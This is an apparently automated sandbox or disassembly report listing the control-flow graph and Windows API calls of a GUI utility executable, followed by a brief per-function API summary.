5308->5298 5309->5298 5311 40141a 5310->5311 5312 40142b 5310->5312 5316 404473 SendDlgItemMessageW 5311->5316 5317 404493 SendDlgItemMessageW 5312->5317 5315 401426 5315->5303 5316->5315 5317->5315 4177 40b50c 4196 40b720 4177->4196 4179 40b518 GetModuleHandleA 4180 40b528 __set_app_type __p__fmode __p__commode 4179->4180 4182 40b5bc 4180->4182 4183 40b5d0 4182->4183 4184 40b5c4 __setusermatherr 4182->4184 4197 40b708 _controlfp 4183->4197 4184->4183 4186 40b5d5 _initterm __wgetmainargs _initterm 4187 40b636 GetStartupInfoW 4186->4187 4189 40b628 4186->4189 4190 40b67e GetModuleHandleA 4187->4190 4198 40955b 4190->4198 4194 40b6b5 _cexit 4194->4189 4195 40b6ae exit 4195->4194 4196->4179 4197->4186 4240 4025f0 LoadLibraryW 4198->4240 4200 40956f 4230 409573 4200->4230 4249 40ac9d 4200->4249 4203 4095b2 4253 4092dd ??2@YAPAXI 4203->4253 4210 409646 4288 405df8 memset 4210->4288 4211 4095fc 4307 405ef7 memset 4211->4307 4214 40960b ??3@YAXPAX 4216 40979b 4214->4216 4217 40962d DeleteObject 4214->4217 4313 404d94 free free 4216->4313 4217->4216 4218 4050bf _wcsicmp 4219 40965c 4218->4219 4219->4214 4222 40967a 4219->4222 4293 409482 4219->4293 4221 4097ac 4314 405336 4221->4314 4312 409261 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 4222->4312 4228 409683 7 API calls 4232 409763 CoUninitialize ??3@YAXPAX 4228->4232 4233 4096f5 4228->4233 4230->4194 4230->4195 4232->4216 4235 409787 DeleteObject 4232->4235 4234 4096fb TranslateAcceleratorW 4233->4234 4237 409721 IsDialogMessageW 4233->4237 4238 40972d IsDialogMessageW 4233->4238 4234->4233 4236 409755 GetMessageW 4234->4236 4235->4216 4236->4232 4236->4234 4237->4236 4237->4238 4238->4236 4239 40973f TranslateMessage DispatchMessageW 4238->4239 4239->4236 4241 402643 6F551CD0 4240->4241 4242 40261b GetProcAddress 4240->4242 4245 40264c 4241->4245 4243 402634 FreeLibrary 4242->4243 4244 40262b 4242->4244 4243->4241 4246 40263f 4243->4246 4244->4243 4247 402653 MessageBoxW 4245->4247 4248 40266a 4245->4248 4246->4245 4247->4200 4248->4200 4250 40aca6 LoadLibraryW 4249->4250 4251 40957e SetErrorMode GetModuleHandleW EnumResourceTypesW 4249->4251 4250->4251 4252 40acba GetProcAddress 4250->4252 4251->4203 4252->4251 4254 409307 ??2@YAPAXI 4253->4254 4256 40933f 4254->4256 4257 40933a 4254->4257 4259 409360 4256->4259 4260 409353 DeleteObject 4256->4260 4337 4024f9 4257->4337 4318 404633 4259->4318 4260->4259 4262 409365 4321 401000 4262->4321 4266 4093af 4326 4097c9 4266->4326 4269 4093e1 4270 404f42 4269->4270 4423 404d94 free free 4270->4423 4274 404f7d 4275 404e75 malloc memcpy free free 4274->4275 4276 40506a 4274->4276 4278 405006 free 4274->4278 4283 405093 4274->4283 4427 404dba wcslen 4274->4427 4437 4044df 4274->4437 4275->4274 4276->4283 4445 404e75 4276->4445 4278->4274 4282 404dba 7 API calls 4282->4283 4424 404eab 4283->4424 4284 4050bf 4285 4050e6 4284->4285 4286 4050c7 4284->4286 4285->4210 4285->4211 4286->4285 4287 4050d0 _wcsicmp 4286->4287 4287->4285 4287->4286 4450 405ed0 4288->4450 4290 405e28 4455 405d70 4290->4455 4470 401f98 4293->4470 4295 409554 4295->4214 4295->4222 4296 4094c7 _wcsicmp 4297 40949c 4296->4297 4297->4295 4297->4296 4299 4094fe 4297->4299 4526 4093ec _wcsicmp 4297->4526 4299->4295 4473 408a99 4299->4473 4303 409514 4506 407725 4303->4506 4308 405ed0 3 API calls 4307->4308 4309 405f2a GetModuleHandleW 4308->4309 4695 405e36 wcscpy wcscpy 4309->4695 4312->4228 4313->4221 4315 405343 4314->4315 4316 40533c free 4314->4316 4317 404d94 free free 4315->4317 4316->4315 4317->4230 4340 404592 memset wcscpy 4318->4340 4320 40464a CreateFontIndirectW 4320->4262 4322 401037 4321->4322 4323 40103b GetModuleHandleW LoadIconW 4322->4323 4324 40100e wcsncat 4322->4324 4325 4017ce wcscpy 4323->4325 4324->4322 4325->4266 4327 4097de 4326->4327 4341 409857 4327->4341 4329 40984a 4357 404d94 free free 4329->4357 4331 4097e4 4331->4329 4335 409835 4331->4335 4354 40492b CreateFileW 4331->4354 4332 4093bd wcsrchr 4332->4269 4335->4329 4336 4044b1 2 API calls 4335->4336 4336->4329 4412 406061 4337->4412 4340->4320 4342 40986b 4341->4342 4358 409a7a memset memset 4342->4358 4344 409981 4371 404d94 free free 4344->4371 4345 409889 memset 4353 409871 4345->4353 4347 409989 4347->4331 4348 4098b2 wcslen wcslen 4348->4353 4349 404dba 7 API calls 4349->4353 4350 409913 wcslen wcslen 4350->4353 4351 40468e wcslen wcscat wcscpy wcscat 4351->4353 4352 404530 GetFileAttributesW 4352->4353 4353->4344 4353->4345 4353->4348 4353->4349 4353->4350 4353->4351 4353->4352 4355 404950 GetFileTime CloseHandle 4354->4355 4356 404966 CompareFileTime 4354->4356 4355->4356 4356->4331 4357->4332 4372 40accc 4358->4372 4361 40426c 2 API calls 4362 409ac9 wcscat 4361->4362 4363 40accc 9 API calls 4362->4363 4364 409ae8 4363->4364 4365 40426c 2 API calls 4364->4365 4366 409aef wcscat 4365->4366 4385 409990 4366->4385 4369 409990 22 API calls 4370 409b1c 4369->4370 4370->4353 4371->4347 4373 40ac9d 2 API calls 4372->4373 4374 40acdb 4373->4374 4375 40ace5 4374->4375 4376 40acf7 memset 4374->4376 4397 404659 4375->4397 4400 40a9bf RegOpenKeyExW 4376->4400 4379 40ad23 4381 40ad2a wcscpy 4379->4381 4382 40ad5d wcscpy 4379->4382 4380 409ac2 4380->4361 4383 40a9d9 RegQueryValueExW 4381->4383 4382->4380 4384 40ad50 RegCloseKey 4383->4384 4384->4382 4386 40999d 4385->4386 4401 40512c 4386->4401 4388 40518c 9 API calls 4394 4099cb 4388->4394 4389 409a69 4409 405225 4389->4409 4391 4050f1 wcscmp wcscmp 4391->4394 4393 40512c 9 API calls 4393->4394 4394->4388 4394->4389 4394->4391 4394->4393 4395 405225 FindClose 4394->4395 4396 404dba 7 API calls 4394->4396 4395->4394 4396->4394 4398 404668 GetVersionExW 4397->4398 4399 404679 4397->4399 4398->4399 4399->4380 4400->4379 4402 405225 FindClose 4401->4402 4403 405139 4402->4403 4404 4044b1 2 API calls 4403->4404 4405 40514c wcslen wcslen 4404->4405 4406 405176 4405->4406 4408 40517d 4405->4408 4407 40468e 4 API calls 4406->4407 4407->4408 4408->4394 4410 405238 4409->4410 4411 40522e FindClose 4409->4411 4410->4369 4411->4410 4422 404991 memset 4412->4422 4414 406074 ??2@YAPAXI 4415 40608b ??2@YAPAXI 4414->4415 4417 4060ac ??2@YAPAXI 4415->4417 4419 4060cd ??2@YAPAXI 4417->4419 4421 402501 4419->4421 4421->4256 4422->4414 4423->4274 4425 404eb1 free 4424->4425 4426 404ebb 4424->4426 4425->4426 4426->4284 4428 404df1 4427->4428 4429 404de8 free 4427->4429 4431 4044df 3 API calls 4428->4431 4430 404dfb 4429->4430 4432 404e14 4430->4432 4433 404e0b free 4430->4433 4431->4430 4435 4044df 3 API calls 4432->4435 4434 404e20 memcpy 4433->4434 4434->4274 4436 404e1f 4435->4436 4436->4434 4438 40452c 4437->4438 4439 4044e6 4437->4439 4438->4274 4439->4439 4440 4044f5 malloc 4439->4440 4441 404522 4440->4441 4442 404507 4440->4442 4441->4274 4443 40451b free 4442->4443 4444 40450b memcpy 4442->4444 4443->4441 4444->4443 4446 404e83 free 4445->4446 4447 404e8e 4445->4447 4449 404e99 4446->4449 4448 4044df 3 API calls 4447->4448 4448->4449 4449->4282 4465 40455f GetModuleFileNameW 4450->4465 4452 405ed6 wcsrchr 4453 405ee5 4452->4453 4454 405ee9 wcscat 4452->4454 4453->4454 4454->4290 4466 404530 GetFileAttributesW 4455->4466 4457 405d79 4458 405df2 4457->4458 4459 405d7e wcscpy wcscpy GetPrivateProfileIntW 4457->4459 4458->4218 4467 40591a GetPrivateProfileStringW 4459->4467 4461 405dcd 4468 40591a GetPrivateProfileStringW 4461->4468 4463 405dde 4469 40591a GetPrivateProfileStringW 4463->4469 4465->4452 4466->4457 4467->4461 4468->4463 4469->4458 4546 406319 4470->4546 4474 408c25 4473->4474 4475 408ab6 memset GetModuleFileNameW wcsrchr 4473->4475 4495 408151 4474->4495 4476 408af9 4475->4476 4477 408afc wcscat 4475->4477 4476->4477 4586 40aabe wcscpy wcscpy 4477->4586 4479 408b3c 4589 4018c0 4479->4589 4484 4050bf _wcsicmp 4487 408b7e 4484->4487 4485 408ba4 4486 4050bf _wcsicmp 4485->4486 4491 408bb5 4486->4491 4487->4485 4488 4044b1 2 API calls 4487->4488 4488->4485 4489 408bde 4490 4050bf _wcsicmp 4489->4490 4493 408bfc 4490->4493 4491->4489 4492 4044b1 2 API calls 4491->4492 4492->4489 4493->4474 4494 4044b1 2 API calls 4493->4494 4494->4474 4496 4081b3 4495->4496 4501 408165 4495->4501 4619 404177 LoadCursorW SetCursor 4496->4619 4498 4081b8 4500 4050bf _wcsicmp 4498->4500 4499 40816c _wcsicmp 4499->4501 4504 4081dc 4500->4504 4501->4496 4501->4499 4620 407ce2 4501->4620 4502 408224 SetCursor 4502->4303 4504->4502 4505 40821b qsort 4504->4505 4505->4502 4507 40652d 3 API calls 4506->4507 4508 407737 4507->4508 4641 40422f CreateFileW 4508->4641 4510 40773f 4511 407855 4510->4511 4512 40774e 4510->4512 4513 40428f 9 API calls 4511->4513 4514 407765 4512->4514 4642 404afc WriteFile 4512->4642 4515 40785e 4513->4515 4643 404177 LoadCursorW SetCursor 4514->4643 4539 408c64 4515->4539 4518 407774 4519 4077aa 4518->4519 4524 4077c5 4518->4524 4644 406d7d 4518->4644 4519->4524 4650 406c4e 4519->4650 4523 407810 CloseHandle SetCursor 4523->4515 4524->4523 4660 40428f 4524->4660 4527 409401 _wcsicmp 4526->4527 4528 4093fd 4526->4528 4529 409412 4527->4529 4530 409416 _wcsicmp 4527->4530 4528->4297 4529->4297 4531 409427 4530->4531 4532 40942b _wcsicmp 4530->4532 4531->4297 4533 409440 _wcsicmp 4532->4533 4534 40943c 4532->4534 4535 409451 4533->4535 4536 409455 _wcsicmp 4533->4536 4534->4297 4535->4297 4537 409466 4536->4537 4538 40946a _wcsicmp 4536->4538 4537->4297 4538->4297 4540 408ca3 4539->4540 4541 408c6f 4539->4541 4540->4295 4542 408c96 4541->4542 4543 408c88 SetCurrentDirectoryW 4541->4543 4679 40616e 4542->4679 4543->4542 4545 408c9b ??3@YAXPAX 4545->4540 4547 40632a 4546->4547 4559 406108 4547->4559 4550 406386 memcpy memcpy 4551 4063d1 4550->4551 4551->4550 4552 40640c ??2@YAPAXI ??2@YAPAXI 4551->4552 4554 4053f1 16 API calls 4551->4554 4553 406448 ??2@YAPAXI 4552->4553 4556 40647f 4552->4556 4553->4556 4554->4551 4556->4556 4569 406299 4556->4569 4558 401fa7 4558->4297 4560 406113 ??3@YAXPAX 4559->4560 4561 40611a 4559->4561 4560->4561 4562 406121 ??3@YAXPAX 4561->4562 4563 406128 4561->4563 4562->4563 4564 406132 ??3@YAXPAX 4563->4564 4565 406139 4563->4565 4564->4565 4566 406159 ??2@YAPAXI ??2@YAPAXI 4565->4566 4567 406152 ??3@YAXPAX 4565->4567 4568 406149 ??3@YAXPAX 4565->4568 4566->4550 4567->4566 4568->4567 4570 404eab free 4569->4570 4571 4062a2 4570->4571 4572 404eab free 4571->4572 4573 4062aa 4572->4573 4574 404eab free 4573->4574 4575 4062b2 4574->4575 4576 404eab free 4575->4576 4577 4062ba 4576->4577 4578 404e75 4 API calls 4577->4578 4579 4062cd 4578->4579 4580 404e75 4 API calls 4579->4580 4581 4062d7 4580->4581 4582 404e75 4 API calls 4581->4582 4583 4062e1 4582->4583 4584 404e75 4 API calls 4583->4584 4585 4062eb 4584->4585 4585->4558 4587 40ab08 4586->4587 4588 40aaec CreateFileW CloseHandle 4586->4588 4587->4479 4588->4587 4590 4018f1 memset 4589->4590 4591 4018d1 4589->4591 4592 401904 4590->4592 4591->4592 4593 4018db GetWindowPlacement 4591->4593 4594 401924 4592->4594 4602 401927 4592->4602 4593->4592 4596 40622e 4594->4596 4597 40624b 4596->4597 4598 40623d 4596->4598 4600 406296 4597->4600 4614 405f41 4597->4614 4609 405fdc 4598->4609 4600->4474 4600->4484 4603 4019b0 4602->4603 4604 401936 4602->4604 4603->4594 4604->4603 4605 40196a GetSystemMetrics 4604->4605 4605->4603 4606 40197e GetSystemMetrics 4605->4606 4606->4603 4607 40198c 4606->4607 4607->4603 4608 401995 SetWindowPos 4607->4608 4608->4603 4610 406042 4609->4610 4611 405feb memset 4609->4611 4610->4597 4611->4610 4612 406002 SendMessageW 4611->4612 4613 40602d 4612->4613 4613->4610 4613->4612 4615 405fd4 4614->4615 4616 405f53 4614->4616 4615->4600 4616->4615 4618 402727 SendMessageW 4616->4618 4618->4616 4619->4498 4630 40652d ??2@YAPAXI 4620->4630 4622 407cf2 4623 407d0f wcslen 4622->4623 4627 407d4d 4622->4627 4624 407d1b _wtoi 4623->4624 4623->4627 4626 407d2a 4624->4626 4625 407d5d _wcsicmp _wcsicmp 4625->4627 4626->4501 4627->4625 4629 407daf 4627->4629 4628 40434a wcslen wcslen _memicmp 4628->4629 4629->4626 4629->4628 4633 4065a6 ??3@YAXPAX 4630->4633 4634 40655f 4630->4634 4633->4622 4634->4633 4635 4064f2 4634->4635 4636 40651f 4635->4636 4637 406504 4635->4637 4639 402bc9 SendMessageW 4636->4639 4637->4634 4640 402bf7 4639->4640 4640->4637 4641->4510 4642->4514 4643->4518 4645 406dc9 4644->4645 4648 406d85 4644->4648 4666 404248 wcslen WriteFile 4645->4666 4647 406dd7 4647->4519 4648->4645 4649 404248 wcslen WriteFile 4648->4649 4649->4648 4655 406c63 4650->4655 4658 406d68 4650->4658 4652 406d76 4652->4524 4653 406c8d wcschr 4654 406c9b wcschr 4653->4654 4653->4655 4654->4655 4655->4653 4656 404eeb 7 API calls 4655->4656 4657 406be3 memset WideCharToMultiByte strlen WriteFile 4655->4657 4655->4658 4659 404eab free 4655->4659 4656->4655 4657->4655 4667 406be3 4658->4667 4659->4655 4661 40429c 4660->4661 4662 4042a3 GetLastError 4661->4662 4663 4042ab 4661->4663 4662->4663 4670 404191 4663->4670 4666->4647 4668 40b780 4667->4668 4669 406bf0 memset WideCharToMultiByte strlen WriteFile 4668->4669 4669->4652 4671 4041c5 FormatMessageW 4670->4671 4672 4041ae LoadLibraryExW 4670->4672 4674 404203 wcscpy 4671->4674 4675 4041de wcslen 4671->4675 4672->4671 4673 4041c0 4672->4673 4673->4671 4676 404212 _snwprintf MessageBoxW 4674->4676 4677 4041f8 LocalFree 4675->4677 4678 4041eb wcscpy 4675->4678 4676->4523 4677->4676 4678->4677 4680 406108 5 API calls 4679->4680 4681 40617c 4680->4681 4682 40618f 4681->4682 4683 404eab free 4681->4683 4684 4061a2 4682->4684 4686 404eab free 4682->4686 4685 406188 ??3@YAXPAX 4683->4685 4687 404eab free 4684->4687 4688 4061b5 4684->4688 4685->4682 4689 40619b ??3@YAXPAX 4686->4689 4690 4061ae ??3@YAXPAX 4687->4690 4691 404eab free 4688->4691 4693 4061c8 4688->4693 4689->4684 4690->4688 4692 4061c1 ??3@YAXPAX 4691->4692 4692->4693 4694 4061f9 free 4693->4694 4694->4545 4706 4059b2 4695->4706 4698 4059b2 3 API calls 4699 405e77 4698->4699 4700 4059b2 3 API calls 4699->4700 4701 405e82 4700->4701 4702 4059b2 3 API calls 4701->4702 4703 405e91 EnumResourceNamesW EnumResourceNamesW wcscpy 4702->4703 4711 405d0f 4703->4711 4707 40b780 4706->4707 4708 4059bf memset GetPrivateProfileStringW 4707->4708 4709 405a0f WritePrivateProfileStringW 4708->4709 4710 405a1f 4708->4710 4709->4710 4710->4698 4712 40b780 4711->4712 4713 405d1c memset 4712->4713 4714 405d3b LoadStringW 4713->4714 4715 405d55 4714->4715 4715->4714 4716 405d6d 4715->4716 4718 405a25 memset _itow 4715->4718 4716->4214 4719 4059b2 3 API calls 4718->4719 4720 405a57 4719->4720 4720->4715 5323 405c0c 5324 405c19 5323->5324 5325 405c20 5324->5325 5329 405c5b 5324->5329 5326 405893 2 API calls 5325->5326 5327 405c2b LoadMenuW 5326->5327 5336 405a5c 5327->5336 5330 405893 2 API calls 5329->5330 5333 405cf0 5329->5333 5331 405c91 CreateDialogParamW memset GetWindowTextW 5330->5331 5331->5333 5334 405cdf 5331->5334 5335 4059b2 3 API calls 5334->5335 5335->5333 5337 40b780 5336->5337 5338 405a6c GetMenuItemCount 5337->5338 5339 405b46 DestroyMenu 5338->5339 5340 405a86 memset GetMenuItemInfoW 5338->5340 5339->5333 5342 405ad7 5340->5342 5341 405ade wcschr 5341->5342 5342->5339 5342->5340 5342->5341 5343 405a5c 5 API calls 5342->5343 5344 405a25 5 API calls 5342->5344 5343->5342 5344->5342 5345 40ab0e WritePrivateProfileStringW 5953 40338f 5954 4033a5 BeginDeferWindowPos 5953->5954 5955 403436 5953->5955 5970 4016c5 GetDlgItem GetClientRect 5954->5970 5961 403444 5955->5961 5974 401765 6 API calls 5955->5974 5959 4016c5 3 API calls 5960 4033db 5959->5960 5962 4016c5 3 API calls 5960->5962 5963 4033ed 5962->5963 5964 4016c5 3 API calls 5963->5964 5965 4033ff 5964->5965 5966 4016c5 3 API calls 5965->5966 5967 40340d 5966->5967 5968 4016c5 3 API calls 5967->5968 5969 40341c EndDeferWindowPos InvalidateRect 5968->5969 5969->5961 5971 4016f9 5970->5971 5972 401758 5971->5972 5973 40170e DeferWindowPos 5971->5973 5972->5959 5973->5972 5974->5961 3879 40b812 3880 40b822 3879->3880 3881 40b81b ??3@YAXPAX 3879->3881 3882 40b832 3880->3882 3883 40b82b ??3@YAXPAX 3880->3883 3881->3880 3884 40b842 3882->3884 3885 40b83b ??3@YAXPAX 3882->3885 3883->3882 3886 40b852 3884->3886 3887 40b84b ??3@YAXPAX 3884->3887 3885->3884 3887->3886 5975 402598 5976 406ba1 5975->5976 5977 404762 modf 5976->5977 5978 406bce 5977->5978 5979 40259d 5980 4053f1 16 API calls 5979->5980 5981 4025a6 5980->5981 5346 40211f 5347 402151 5346->5347 5348 40212b strlen 5346->5348 5350 404afc WriteFile 5348->5350 5350->5347 5982 40109f 5983 401272 5982->5983 5984 4010b7 5982->5984 5985 4012a8 SetDlgItemTextW 5983->5985 5986 40127c GetDlgItem ShowWindow GetDlgItem ShowWindow 5983->5986 5987 40123d 5984->5987 5988 4010be 5984->5988 5989 4012bb SetWindowTextW SetDlgItemTextW SetDlgItemTextW 5985->5989 5986->5989 5992 401256 EndDialog DeleteObject 5987->5992 6010 40111f 5987->6010 5990 4010c7 5988->5990 5991 4011df GetDlgItem 5988->5991 6013 40103e 5989->6013 5994 4010d2 5990->5994 5995 40115d GetDlgItem ChildWindowFromPoint 5990->5995 5996 4011f4 SetBkMode SetTextColor GetSysColorBrush 5991->5996 5997 40121a 5991->5997 5992->5983 5998 4010da GetDlgItem ChildWindowFromPoint 5994->5998 5994->6010 6000 4011b0 5995->6000 6001 401193 GetModuleHandleW LoadCursorW SetCursor 5995->6001 5996->6010 5999 401228 GetDlgItem 5997->5999 5997->6010 6003 401110 5998->6003 6004 401129 5998->6004 6005 40123b 5999->6005 5999->6010 6006 4011be GetDlgItem ChildWindowFromPoint 6000->6006 6000->6010 6001->6010 6012 40496b ShellExecuteW 6003->6012 6008 401137 GetDlgItem ChildWindowFromPoint 6004->6008 6004->6010 6005->5996 6009 4011dd 6006->6009 6006->6010 6007 4048c4 5 API calls 6007->6010 6008->6003 6008->6010 6009->6001 6012->6010 6018 404592 memset wcscpy 6013->6018 6015 401056 CreateFontIndirectW SendDlgItemMessageW 6016 401088 SendDlgItemMessageW 6015->6016 6017 40109c 6015->6017 6016->6017 6017->6007 6018->6015 6019 40319f 6023 4031af 6019->6023 6024 4031d8 6019->6024 6022 403204 6028 4053f1 16 API calls 6022->6028 6032 403233 6022->6032 6025 4053f1 16 API calls 6023->6025 6023->6032 6024->6022 6026 403259 2 API calls 6024->6026 6024->6032 6027 4031c9 6025->6027 6026->6022 6033 40adf2 SHGetMalloc 6027->6033 6030 403224 6028->6030 6031 40adf2 4 API calls 6030->6031 6031->6032 6038 401619 6032->6038 6034 40ae0c SHBrowseForFolderW 6033->6034 6036 40ae62 6033->6036 6035 40ae40 SHGetPathFromIDListW 6034->6035 6034->6036 6035->6036 6037 40ae52 wcscpy 6035->6037 6036->6024 6037->6036 6039 401626 6038->6039 6040 40164d 6038->6040 6039->6040 6041 40163d EndDialog 6039->6041 6041->6040 6046 4024a1 6047 4024ba 6046->6047 6048 4024ad 6046->6048 6049 4024d2 6047->6049 6055 404248 wcslen WriteFile 6047->6055 6054 404248 wcslen WriteFile 6048->6054 6056 404248 wcslen WriteFile 6049->6056 6053 4024f1 6054->6047 6055->6049 6056->6053 5351 409b23 5352 409b30 5351->5352 5353 409bb9 5352->5353 5355 409b3d 5352->5355 5356 4048c4 5 API calls 5353->5356 5354 409e04 5355->5354 5358 409b61 EndDialog 5355->5358 5364 409b6e 5355->5364 5357 409bc1 8 API calls 5356->5357 5359 409c88 5357->5359 5360 409c9e ReadProcessMemory 5357->5360 5358->5364 5382 4049cd memset 5359->5382 5362 409cba 5360->5362 5363 409ccd 5360->5363 5366 4049cd 5 API calls 5362->5366 5389 40467d 5363->5389 5364->5354 5368 409b78 GetDlgItem SendMessageW SendMessageW SendMessageW 5364->5368 5366->5363 5368->5354 5370 409cd8 5392 40a0c9 5370->5392 5371 409cdf 5402 40a045 5371->5402 5374 409cdd 5375 409cf4 memset GetCurrentProcessId 5374->5375 5376 409d6d _snwprintf SetDlgItemTextW GetDlgItem SetFocus 5374->5376 5410 40a247 5375->5410 5376->5354 5379 409d32 memcpy 5379->5376 5380 409d53 5379->5380 5381 409d5e wcscpy 5380->5381 5381->5376 5383 4049fb _snwprintf 5382->5383 5384 404a20 wcscat 5383->5384 5385 404a2d 5383->5385 5384->5385 5386 404a4a wcscat 5385->5386 5387 404a3d wcscat 5385->5387 5386->5383 5388 404a62 5386->5388 5387->5386 5388->5360 5390 404659 GetVersionExW 5389->5390 5391 404682 5390->5391 5391->5370 5391->5371 5393 40a0d6 LoadLibraryW 5392->5393 5395 40a15f 5392->5395 5394 40a0e8 GetProcAddress 5393->5394 5393->5395 5396 40a100 GetProcAddress 5394->5396 5397 40a144 5394->5397 5395->5374 5396->5397 5398 40a111 GetProcAddress 5396->5398 5397->5395 5399 40a158 FreeLibrary 5397->5399 5398->5397 5400 40a122 GetProcAddress 5398->5400 5399->5395 5400->5397 5401 40a133 GetProcAddress 5400->5401 5401->5397 5403 40a0bc 5402->5403 5404 40a04e GetModuleHandleW 5402->5404 5403->5374 5404->5403 5405 40a060 GetProcAddress 5404->5405 5405->5403 5406 40a078 GetProcAddress 5405->5406 5406->5403 5407 40a089 GetProcAddress 5406->5407 5407->5403 5408 40a09a GetProcAddress 5407->5408 5408->5403 5409 40a0ab GetProcAddress 5408->5409 5409->5403 5411 40a257 5410->5411 5412 40467d GetVersionExW 5411->5412 5413 40a265 5412->5413 5414 40a279 OpenProcess 5413->5414 5420 40a38a 5413->5420 5415 409d28 5414->5415 5423 40a294 5414->5423 5415->5376 5415->5379 5416 40a452 CloseHandle 5416->5415 5417 40a2ce memset memset 5417->5423 5418 40a3d4 memset wcscpy 5419 40a467 memcpy 5418->5419 5419->5420 5420->5415 5420->5416 5420->5418 5423->5416 5423->5417 5424 40a385 5423->5424 5425 40a161 5423->5425 5441 40a467 5423->5441 5424->5416 5426 40a171 wcscpy 5425->5426 5427 40a174 wcschr 5425->5427 5439 40a242 5426->5439 5427->5426 5429 40a196 5427->5429 5445 40434a wcslen wcslen 5429->5445 5432 40a1ac memset 5449 404708 5432->5449 5433 40a1ee 5435 40a1f4 memset 5433->5435 5436 40a239 wcscpy 5433->5436 5438 404708 2 API calls 5435->5438 5436->5439 5437 40a1d1 wcscpy wcscat 5437->5439 5440 40a219 memcpy wcscat 5438->5440 5439->5423 5440->5439 5442 40a477 5441->5442 5444 40a4a6 5441->5444 5443 40a485 memcpy 5442->5443 5442->5444 5443->5444 5444->5423 5446 404371 5445->5446 5447 404395 5445->5447 5446->5447 5448 404379 _memicmp 5446->5448 5447->5432 5447->5433 5448->5446 5448->5447 5450 404718 GetWindowsDirectoryW 5449->5450 5451 404729 wcscpy 5449->5451 5450->5451 5451->5437 5452 40a825 5453 40a835 5452->5453 5454 40a878 5452->5454 5455 40a885 5453->5455 5462 4046b2 memset GetClassNameW _wcsicmp 5453->5462 5463 40a4ac 5454->5463 5458 40a87d 5459 4048c4 5 API calls 5458->5459 5459->5455 5460 40a842 5460->5455 5461 40a847 SetBkMode SetBkColor SetTextColor GetStockObject 5460->5461 5461->5455 5462->5460 5464 40b780 5463->5464 5465 40a4bc GetDlgItem GetDlgItem 5464->5465 5466 40a4f6 GetWindowRect GetWindowRect MapWindowPoints MapWindowPoints 73A1A570 5465->5466 5470 40a59f 5466->5470 5472 40a614 5466->5472 5468 40a751 8 API calls 5468->5458 5469 40a5bf wcslen GetTextExtentPoint32W 5469->5470 5470->5469 5470->5472 5472->5468 5476 401537 GetModuleHandleW CreateWindowExW 5472->5476 5477 401537 GetModuleHandleW CreateWindowExW 5472->5477 5474 40a6d2 _snwprintf SetWindowTextW 5475 40a71b SetWindowTextW 5474->5475 5475->5468 5475->5472 5476->5472 5477->5474 6057 408ca5 DeleteFileW 6058 408a99 19 API calls 6057->6058 6059 408cbd 6058->6059 6060 408c64 13 API calls 6059->6060 6061 408cc4 PostQuitMessage 6060->6061 4168 40ab2b 4171 40a98e 4168->4171 4170 40ab4b 4172 40a99a 4171->4172 4173 40a9ac GetPrivateProfileIntW 4171->4173 4176 40a89b memset _itow WritePrivateProfileStringW 4172->4176 4173->4170 4175 40a9a7 4175->4170 4176->4175 6062 4075ae 6063 40652d 3 API calls 6062->6063 6064 4075c1 6063->6064 6082 40422f CreateFileW 6064->6082 6066 4076eb 6067 4075f5 6084 404177 LoadCursorW SetCursor 6067->6084 6068 4075c9 6068->6066 6068->6067 6083 404afc WriteFile 6068->6083 6071 407604 6072 40763a 6071->6072 6073 407654 6071->6073 6074 406d7d 2 API calls 6071->6074 6072->6073 6075 406c4e 14 API calls 6072->6075 6076 406204 SendMessageW 6073->6076 6074->6072 6075->6073 6077 407669 6076->6077 6078 406811 SendMessageW 6077->6078 6080 407572 2 API calls 6077->6080 6081 4076ac CloseHandle SetCursor 6077->6081 6078->6077 6080->6077 6081->6066 6082->6068 6083->6067 6084->6071 5478 40662f 5480 406640 5478->5480 5479 406685 5480->5479 5481 40667d _wcsicmp 5480->5481 5481->5479 6085 4057b2 6086 40b780 6085->6086 6087 4057bf memset GetDlgCtrlID 6086->6087 6088 4058e3 5 API calls 6087->6088 6089 4057f3 6088->6089 6090 405809 6089->6090 6091 4057f9 SetWindowTextW 6089->6091 6091->6090 5482 40b433 _onexit 5483 408234 5486 40823e 5483->5486 5487 408251 8 API calls 5486->5487 5488 40823c 5486->5488 5487->5488 6092 40abb6 6093 40a98e 4 API calls 6092->6093 6094 40abe4 6093->6094 6095 407cbb 6098 407cc6 6095->6098 6097 407cdf 6098->6097 6099 407c13 6098->6099 6100 40b780 6099->6100 6101 407c20 memset memset 6100->6101 6103 407c71 6101->6103 6102 407cb0 6102->6098 6103->6102 6104 407ca8 _wcsicmp 6103->6104 6104->6102 6105 40b6bd _XcptFilter 6106 4068be 6107 4068ce 6106->6107 6108 406204 SendMessageW 6107->6108 6113 406903 6108->6113 6109 4069c4 6111 4069f4 6109->6111 6112 4069e0 6109->6112 6114 406696 3 API calls 6109->6114 6110 406811 SendMessageW 6110->6113 6112->6111 6116 406211 SendMessageW 6112->6116 6113->6110 6115 406922 SendMessageW 6113->6115 6119 40695c 6113->6119 6121 406848 6113->6121 6114->6112 6115->6113 6116->6111 6118 402761 2 API calls 6118->6119 6119->6109 6119->6118 6120 406848 3 API calls 6119->6120 6120->6119 6122 4068b1 6121->6122 6125 40685a 6121->6125 6122->6113 6124 406883 wcscmp 6124->6125 6125->6122 6125->6124 6127 402b9d SendMessageW 6125->6127 6128 402b34 SendMessageW 6125->6128 6127->6125 6128->6125

                                        Executed Functions

                                        Function 0040518C Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 332 40518c-405195 333 405197-4051b6 FindFirstFileW 332->333 334 4051b8-4051cc FindNextFileW 332->334 335 4051d3-4051d8 333->335 336 4051da-405208 wcslen * 2 334->336 337 4051ce call 405225 334->337 335->336 339 40521e-405224 335->339 340 405217 336->340 341 40520a-405215 call 40468e 336->341 337->335 343 40521b-40521d 340->343 341->343 343->339
                                        APIs
                                        • FindFirstFileW.KERNELBASE(00000103,0000038B,?,?,00409A61,00000000,?), ref: 004051A2
                                        • FindNextFileW.KERNELBASE(000000FF,0000038B,?,?,00409A61,00000000,?), ref: 004051C0
                                        • wcslen.MSVCRT ref: 004051F0
                                        • wcslen.MSVCRT ref: 004051F8
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
